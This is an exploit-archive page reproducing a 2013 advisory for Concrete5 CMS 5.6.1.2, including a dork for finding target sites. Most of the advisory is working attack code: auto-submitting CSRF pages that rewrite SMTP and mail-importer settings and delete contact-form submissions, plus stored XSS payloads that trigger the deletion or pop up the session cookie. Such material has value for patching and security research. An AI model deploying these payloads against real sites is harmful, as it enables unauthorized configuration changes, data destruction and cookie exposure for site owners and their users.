exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Concrete5 CMS 5.6.1.2 Cross Site Request Forgery / Cross Site Scripting

Concrete5 CMS 5.6.1.2 Cross Site Request Forgery / Cross Site Scripting
Posted Jun 10, 2013
Authored by expl0i13r

Concrete5 CMS version 5.6.1.2 suffers from multiple cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | ee5b8075000df622272220b838f5ac287abf4b8ad61ae58d1f58d40e1f2f6b4f

Concrete5 CMS 5.6.1.2 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
=============================================================
__ __ _ ___ _ __ ____
\ \ / / | | / _ \ (_) /_ | |___ \
___ \ V / _ __ | | | | | | _ | | __) | _ __
/ _ \ > < | '_ \ | | | | | | | | | | |__ < | '__|
| __/ / . \ | |_) | | | | |_| | | | | | ___) | | |
\___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_|
| |
|_| blackpentesters.blogspot.com
=============================================================

###########################################################################################
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities] #
# Date: [2013-6-9] #
# Exploit Author: [expl0i13r] #
# Vendor Homepage: [http://www.concrete5.org/] #
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/] #
# Version: [5.6.1.2] #
# Goole Dork: [Built with concrete5 - an open source CMS] #
# Tested on: [Windows] #
# Contact: expl0i13r@gmail.com #
###########################################################################################

Summary:
========
1. CSRF (Modify SMTP Settings)
2. CSRF (Modify Mail Importers Settings)
3. CSRF (Delete Form Results)
4. Stored XSS


1. CSRF (Modify SMTP Settings):
================================

concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities one of which allow an attacker
to modify "SMTP Settings" and "Send Mail Method" available at below URL :

Affected URL:
--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/


----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update it, when Victim loads this page
----------------------------------------------------------------------------------------

<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">

<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">
<option value="">None</option>
<option value="SSL" selected="selected">SSL</option>
<option value="TLS">TLS</option></select>
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">

</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>


2. CSRF (Modify Mail Importer Settings)
=========================================

Below code exploits CSRF vulnerability which allows attacker to Edit and update "Importer Settings" details.

Affected URL :
---------------

http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/

----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update them, when Victim loads this page
----------------------------------------------------------------------------------------

<html>
<head>
<script type="text/javascript" language="javascript">

function submitform()
{
document.getElementById('myForm').submit();

}

</script>
</head>

<body>

<form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">

<input type="hidden" name="miID" id="miID" value="1">
<input id="miEmail" type="text" name="miEmail" value="exploiter">
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text"> <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">

<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">
<option value="" selected="selected">None</option>
</select>

<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">
<option value="1" selected="selected">Yes</option>
</select>

<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">
<option value="POP" selected="selected">POP</option>
</select>

<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>

</body>
</html>


3. CSRF (Delete Form Results)
===============================

Each Submissions available at "REPORTS" > "Form Results" page has static "qsID" assigned, using which attacker can delete submissions.

Ex.
---
When we install this CMS, "Contact Us" form by default available at URL : http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/

For above "Contact Form", qsID in my case is "1370626098", which can be found at url:

--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/
--------------------------------------------------------------------------------------

<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------

In order to exploit this CSRF, attacker must have "qsID" values, for which attacker needs to have at least Limited access to CMS.

Steps:
------

1. Attacker logs in to CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Gets Static "qsID" value from source code
4. Use "qsID" to create below CSRF exploit

Code:
-------

<html>
<head>
<script>
function delete()
{

# Delete Submissins "Contact Us" page

window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")

}
</script>
</head>
<body onload="delete()">
</body>
</html>


4. Multiple Stored XSS
=======================

concrete5 CMS also suffers from Stored XSS vulnerability, which can be used to "Delete Form Results"
everytime page is loaded.

Stored XSS-1
============

URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/

Vulnerable Parameter:
----------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">


XSS-CSRF Payload:
------------------

"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>


Stored XSS-2:
=============

URL:
-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/

Vulnerable Parameter:
----------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">

Payload:
---------

"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>


##################################
# eXpl0i13r #
# ------------------------------ #
#|blackpentesters.blogspot.com |#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close